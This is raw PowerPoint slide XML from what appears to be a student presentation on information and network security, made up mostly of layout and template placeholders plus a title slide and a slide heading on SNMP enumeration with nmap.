            <a:ext cx="919162" cy="221403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:defRPr lang="en-US" sz="1400" baseline="0" dirty="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place Logo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{17F98B69-A70A-4FD4-BC4B-9A1C7D3973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4880622-6454-41CB-A79A-7C721B215273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1214437"/>
            <a:ext cx="6002721" cy="571500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2400" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:defRPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executive Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{92F3C1A0-1D1B-452F-82B6-43AA87D10FD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73FDA20-6F55-49FA-9E86-FCE7F3A01969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448226" y="5285132"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Dosis Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{D7F498DC-5090-4D6B-9791-E28E14A740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935848-19E5-41D3-8F30-F0D697343CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1809750"/>
            <a:ext cx="6002721" cy="760818"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400"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stStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brief summary / description of the project – Remember, Strong slides are a support for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your entire presentation, not a substitute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your presentation is a live experience carried by the presenter so it’s important to visually represent your points without asking your audience to divide their attention too much.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{EBAD072C-CC48-41BD-AE64-3501869817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B7A72D-8057-4C82-92E1-C32E8F8F909F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="68580" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">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DBE8AF49-3F0F-4B63-8AFF-C6B19EE31B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58E461-C7C6-4242-AB5A-E75B150D947D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="3162300"/>
            <a:ext cx="5603986" cy="1260833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" lvl="0" indent="-342900">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" lvl="1" indent="-285750">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" lvl="2" indent="-228600">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" lvl="3" indent="-228600">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" lvl="4" indent="-228600">
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Dosi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5D925E62-B5FE-4475-BB7F-ECC5370568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9840BA2-C756-4B26-920B-4C426E5FA555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="3219450" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="381000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
              <a:defRPr lang="en-US" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 10">
            <a:extLst>
              <a:ext uri="{4528C6C4-8D1E-4B6A-AF66-DB933C05A3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29C74A-444D-4B9E-86F0-F6609AAD63C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800100" y="2590800"/>
            <a:ext cx="5600700" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="91440" bIns="0" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="0" lvl="3">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri-medium"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="0" lvl="4">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri-medium"/>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1">
            <a:extLst>
              <a:ext uri="{718AAC42-2248-4070-91E2-E8A645A588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472E76-8C71-4384-8B1D-FF6ADBBF640A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="7"/>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AF73B3E0-4B37-497C-B613-BFC3527C33AF}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{4904F07D-FBA4-444E-89F3-2AA00179488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65FC52F-C3F1-420E-B9F1-DCCB856F0F08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="8"/>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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{4CD422AB-35EE-4EE0-8339-32B3054D2C7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blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1">
            <a:extLst>
              <a:ext uri="{384E97C2-EB7F-4FE1-B110-C8114B7E323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113141-E191-42DD-8E3A-0E0B6DAB92C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="543951"/>
            <a:ext cx="7886700" cy="484748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{512423C6-CAA4-4B7D-A9C2-19D0EAE069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93B343-2C9A-4A7D-B339-0FA794610933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1200150"/>
            <a:ext cx="7886700" cy="3432572"/>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A12C2AF-6BB9-4B88-B177-EEA8DF818C9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BC84D3-0E0E-4035-A15B-9459BB5F82D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8599983" y="469057"/>
            <a:ext cx="369463" cy="273843"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r">
              <a:defRPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3478B6"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1FBF58C6-8EBB-49EC-A0A8-AF6C00D7C7B3}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{0CCC41F0-1243-486C-BCB1-BA7CB8CB0BB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B2515C-6FD1-4BD9-8AE4-EED80B83B089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>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3F2D3689-575B-469E-A329-C385F9B5BBC8}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 1">
            <a:extLst>
              <a:ext uri="{8524EA54-3EA2-4E48-8CC7-E08D0BE6DF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02230B-155B-431C-9682-7D4B25997A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4857750"/>
            <a:ext cx="5181600" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr lvl="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="2800" b="1" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Unica One"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Dosis"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="457200" lvl="1" indent="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Dosis"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914400" lvl="2" indent="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Dosis"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1371600" lvl="3" indent="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Dosis"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1828800" lvl="4" indent="0" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr lang="en-US" sz="1800" b="0" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Dosis"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" lvl="5" indent="-228600" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="1800" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" lvl="6" indent="-228600" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="1800" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" lvl="7" indent="-228600" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="1800" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" lvl="8" indent="-228600" algn="l" rtl="0">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buChar char="•"/>
        <a:defRPr lang="en-US" sz="18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6.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/video" Target="https://www.youtube.com/embed/hJ8IwyhqzD4?feature=oembe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blipFill dpi="0" rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect t="-9300" b="-9300"/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{4389634A-8D41-4E1F-BA25-390ED5ACC8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3F123F8-C844-47F6-AF6F-493AC7532C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information &amp; network security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 16">
            <a:extLst>
              <a:ext uri="{FC04AB9F-A1AB-4A77-8DE0-FB158C88A51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917AC55-7E0C-435E-AE0E-0BBBA9D1DBC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Dr. Rashi Chaudhary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 4">
            <a:extLst>
              <a:ext uri="{15BFD93B-F94E-4B93-AAD0-48172042A4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522094C-B0FE-4DDD-BEE8-2F2950C5015F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752351" y="124244"/>
            <a:ext cx="3379222" cy="1195016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 6">
            <a:extLst>
              <a:ext uri="{00240E78-617B-4B84-9AC6-D6779C50626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317E0D1-E9F2-47E7-9369-9EF0C36EA90C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367137" y="4122591"/>
            <a:ext cx="3232842" cy="735158"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="95250" tIns="47625" rIns="95250" bIns="47625" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Dayananda Bindhani</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>B.Tech-M.Tech CSE (Cyber Security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr lang="en-US" sz="1400" dirty="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>022200300004018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{BCFBBE11-B08B-42A8-A99A-1510A18FF5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92BA2A-3A21-47DE-81A5-16ED6E5F4AED}"/>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8DAC1796-7C4D-4E6D-B2FC-15408887DBEB}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{EFEA5F2F-4C44-4172-B891-68285442A38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B2CFE2F7-F6D5-46AE-B0B5-535CC28BCF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B522E37-2D5F-42B5-870E-C49121D28F5F}"/>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SNMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Enumeration (nmap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{14847CF2-378D-4C55-A2C6-A5CE46A440F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947582C-2C83-49DF-B6A9-1B7930D39F6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
